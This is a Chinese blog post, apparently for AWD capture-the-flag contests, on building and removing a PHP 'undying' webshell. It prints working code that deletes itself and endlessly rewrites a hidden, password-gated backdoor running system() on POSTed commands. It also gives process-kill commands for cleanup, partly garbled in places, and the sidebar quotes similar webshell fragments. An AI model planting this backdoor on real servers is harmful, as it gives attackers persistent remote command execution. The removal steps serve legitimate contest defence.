渗透测试-不死马的创建和查杀

已于 2023-01-20 10:27:38 修改
阅读量2.1k 收藏 13
点赞数
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-09-01 13:57:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126638536
版权

不死马的创建和查杀

文章目录

0x00 创建

md5加密密码:

在这里插入图片描述

代码:

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e424b5e91"){@system($_POST[cmd]);} ?>';

while (1){
file_put_contents( f i l e , file, file,code);
}
?>

触发执行:
在这里插入图片描述

0x01 查看

权限:在这里插入图片描述
内容:在这里插入图片描述
执行:在这里插入图片描述

0x02 查杀

root用户角度的查杀:

1、杀掉进程

ps aux | grep www-data | awk ‘{print $2}’ | xargs kill -9
2、重启服务

重启web服务。

其他用户的查杀:

在awd中,ctf用户没有权限,不能重启服务,而且,以ctf的用户来杀进程和条件竞争也是不可行的。

(不死马会先创建,然后被删除,在创建到被删除的过程中会可利用。)

最简单的方式就是以www-data用户的角度通过杀进程来实现查杀。

1、杀掉进程:

<?php @system("ps -aux | grep www-data | awk '{print $2}' | xargs kill -9"); ?>

2、条件竞争:
不推荐,如果不死马中没有调用usleep()函数,进行延时的话,条件竞争是gg的。

炫彩@之星
关注
  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 1822
关于PHP不死马的分析和总结
linux基础知识
Chen_Sir____的博客
11-11 171
命令解析器: shell – unix操作系统 bash – Linux操作系统 本质:根据命令的名字,调用对应的可执行程序 Linux快捷键 date:时间 history:历史(ctrl+p=在历史记录中一条一条向上切换 ctrl+n=在历史记录中一条一条向下切换) 光标移动:往回=ctrl+b 往后=ctrl+f 行首=ctrl+a 行尾=ctrl+e 行中字符删除操作:光标前=ctrl+h 光标后=ctrl+d(光标后即光标覆盖的字符) 行中光标前所有字符操作:光标前=ctrl+u 自动填充命令:
AWD-----监控&不死马&垃圾包&资源库
qi_SJQ_的博客
02-27 4140
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后门攻击漏洞的数据包便于后期利用 分析有后门或无后门的攻击行为数据包找到漏洞进行修复 分析到成功攻击的数据包进行自我利用,用来攻击其他队伍 安恒的awf部署比较麻烦,比赛时系统日志不太好用,因此用日志分析监控的脚本好,可以实时生成日志。 推荐项目:AWD_Hunter-master 3.攻击-----
7.awd不死马权限维持及变种
山兔的博客
09-22 2401
不死马又叫内存,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行。 不死马.php—>上传到server—>server执行文件—>server本地无限循环生成 (一句话.php) 不死马生成的一句话木可以自定义。 <?php ignore_user_abort(true); //函数设置于客户机断开后,不会终止脚本的执行 set_time_limit(0); //设置脚本的最大执行时间,0代表无限制 unlink(__FILE__); //删除文件本身
p81 红蓝对抗-AWD 监控&不死马&垃圾包&资源库
weixin_43263566的博客
03-15 2549
p81 红蓝对抗-AWD 监控&不死马&垃圾包&资源库
行业资料-交通装置-一种木查杀工具.zip
08-31
行业资料-交通装置-一种木查杀工具.zip
ASP大网站渗透测试
01-15
 本身代码经过变量转换和替换字符加密,可完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木查杀等IIS防火墙和查杀工具。  程序结合海洋顶端asp木、老兵asp木、Drakblade暗黑之剑1.3版本、05年到13年主流asp木的...
安全相关-病毒防治-trojan remover(木查杀) v6.zip
08-12
安全相关-病毒防治-trojan remover(木查杀) v6.zip
浏览器被劫持木查杀hrkill-1.0.0.50.exe
04-17
浏览器被劫持木查杀hrkill-1.0.0.50
webshell不死僵尸大
10-06
webshell不死僵尸大(去后门本人专用)
金盾---木查杀 下载,我用还好
11-18
查杀,最近被病毒困扰,用了以后还行,推荐给大家分享一下
Windows权限维持之php不死马、映像劫持、策略组脚本
Longwaer
01-09 1226
通过学习掌握Windows权限维持手段,提升在个人知识小技巧,更快的知晓权限维持的作用性。
不死马原理
看不尽的尘埃——博客
11-19 4361
前言 首先普及一下木、病毒和后门的概念。 木 除具有以上功能外还具有主动攻击性,就是说感染木后,木传输者可以远程控制你的计算机,在你不知道的情况下查看你的隐私文件,资料等......... 后门 后门,本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目...
php的内存的原理与查杀方法
遇事不决冲冲冲
08-11 6609
内存原理 PHP内存即PHP不死马,简单来说就是会写进PHP进程里,无限在指定目录中生成木文件 生成过程 不死马.php → 上传到server → server执行文件 → server本地循环不断生成一句话木 不死马 初代 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '2.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91
不死马php如何取证_干掉 PHP 不死马
weixin_39880621的博客
01-30 823
在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.什么是不死马先说一下什么是不死马, 比如这种12345678910set_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = "";file_put_contents(".shell.php", $c...
不死马的使用
山兔的博客
09-11 619
一、域名后面加上文件名在加参数,不然会找不到一句话木在哪里,那自然无法webshell啦 模板:http://192.168.248.134:8801/1.php?2=assert 二、不死马的生成需要触发条件,那就是访问url/文件名.php 连接的时候,输入数据记得要在英文的环境下编写, 模板:URL地址:http://192.168.248.134:8801/.index.php?pass=MD5加密之前的字符 连接密码:一句话木的连接字符 编码器:chr16 ...
不死马
a674212706的博客
08-05 1211
什么是不死马? 内存,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。 生成过程 不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php) 两种不死马 网上流传的不死马 <?php ignore_user_abort(true); set_time_limit(0); unlink(...
WHAT - 前端安全性测试和常见攻击手段
最新发布
weixin_58540586的博客
05-10 1291
前端安全性测试和常见攻击手段。
全盘 u盘变种synaptics查杀 恢复exe和xlsx文件
10-21
全盘 U 盘变种 Synaptics 查杀恢复 EXE 和 XLSX 文件可能需要以下步骤: 1. 首先,确保您的计算机已经得到了最新的杀毒软件更新,并运行全盘扫描来查杀所有可能的恶意软件。Synaptics 是一个输入设备驱动程序,并不会直接对 EXE 或 XLSX 文件产生影响,因此大部分情况下,杀毒软件可以帮助您查杀恶意软件并修复被感染的文件。 2. 如果杀毒软件没有成功修复文件,您可以尝试使用数据恢复软件来恢复您的 EXE 和 XLSX 文件。数据恢复软件可以扫描您的硬盘和 U 盘,并尝试恢复被删除或损坏的文件。请注意,成功恢复文件的几率取决于文件被感染的程度和其所在的存储位置。 3. 如果上述方法都不起作用,您可以尝试使用备份文件来恢复丢失的 EXE 和 XLSX 文件。如果您定期备份数据,并且备份了需要恢复的文件,那么您可以通过还原备份来恢复丢失的文件。确保备份文件是在感染之前创建的,以避免将恶意软件恢复到您的计算机上。 总之,全盘 U 盘变种 Synaptics 查杀并恢复 EXE 和 XLSX 文件可能需要使用杀毒软件进行查杀,数据恢复软件进行文件恢复,或者使用备份文件进行还原操作。不同情况下的恢复方法可能会有所不同,请根据您的实际情况选择合适的方法。同时,为了保护您的计算机和数据安全,建议定期备份重要文件,并保持杀毒软件的更新。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值